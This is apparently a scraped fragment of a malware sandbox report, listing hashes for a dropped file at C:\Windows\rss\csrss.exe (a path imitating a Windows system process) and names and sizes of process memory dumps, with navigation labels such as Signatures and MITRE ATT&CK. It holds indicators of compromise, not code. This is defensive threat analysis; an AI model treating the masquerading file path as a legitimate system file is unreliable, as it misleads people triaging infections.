
SHA512
f6485850867e5e5252797f8bed140476774ea47592f82c0be54c9fa0a35a2fdbd8b6f2df3d8830383b23b0ff0133e1626a6480fd8d9251f13ae6d142ca3a3faf

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
2fc8294b8293300d1cd0103e309e72dd

SHA1
ca7a4820722fa831f5d0d49ee2dd56424739ba63

SHA256
6f6c851507ca2e9b832c3173fd0a485ad70ef89edf3bb9adf26687519ed3b2dd

SHA512
2c3c803c927551724d0e09829f4d5844ca282805f43abd152b4aecdbbcbc6330d960a2cceac397448e0169741630e26d1bdc017c824ae76b8e02d3bcc9cc073e

Download Submit
memory/384-147-0x0000000000000000-mapping.dmp

Download
memory/620-139-0x0000000000000000-mapping.dmp

Download
memory/1144-138-0x0000000000000000-mapping.dmp

Download
memory/1808-136-0x0000000000000000-mapping.dmp

Download
memory/2156-149-0x0000000000000000-mapping.dmp

Download
memory/2212-140-0x0000000000000000-mapping.dmp

Download
memory/2212-146-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/2212-143-0x0000000005800000-0x0000000005BA7000-memory.dmp

Filesize
3.7MB

Download
memory/2304-131-0x0000000005700000-0x0000000005DF6000-memory.dmp

Filesize
7.0MB

Download
memory/2304-132-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/2304-130-0x000000000534A000-0x00000000056F1000-memory.dmp

Filesize
3.7MB

Download
memory/3256-137-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/3256-133-0x0000000000000000-mapping.dmp

Download
memory/3256-134-0x00000000053B1000-0x0000000005758000-memory.dmp

Filesize
3.7MB

Download
memory/3592-144-0x0000000000000000-mapping.dmp

Download
memory/4228-145-0x0000000000000000-mapping.dmp

Download
memory/4492-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads